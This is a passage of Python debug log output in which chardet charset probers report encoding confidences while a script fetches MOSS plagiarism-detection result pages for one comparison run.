active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5141803583741161\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5148091255921858\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match14-top.html\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match14-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match14-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match13-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match13-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match13-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match8-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match8-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match8-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match15-top.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19259\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19943\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19441\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 32176\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19246\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19930\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19428\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19259\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19943\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 32163\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19441\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19246\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19930\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 32176\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19428\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19246\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19930\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 32163\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19428\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19931\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19247\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19429\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 32163\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19930\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19246\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19428\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 32164\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5263681342534446\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5433467222841619\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 32163\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.541686188119407\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5241262908551579\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match15-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match15-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match12-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match12-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match12-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match11-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match11-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match11-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19441\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19474\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 22532\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19428\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 22519\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19461\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 22532\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19474\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19441\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 40587\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 20279\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 22519\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19461\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19428\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 40574\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 20266\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 22519\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19461\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19428\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19462\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 40587\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 20279\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 22520\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19429\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19461\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 20266\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 40574\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 22519\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19428\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 20266\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 40574\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 20267\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 40575\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 20266\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 40574\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5423208952924831\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5243190089355664\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.541686188119407\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5598098262023146\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5506336847281116\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match22-top.html\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match22-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match22-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match23-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match23-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match23-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match16-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match16-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match16-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 17966\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 17953\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 17966\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 17953\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 22176\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 17953\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 17954\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 22163\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 17953\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 22176\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 22163\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 32821\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 22163\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 32808\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 22164\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 32821\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 22163\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 32808\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 32808\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not 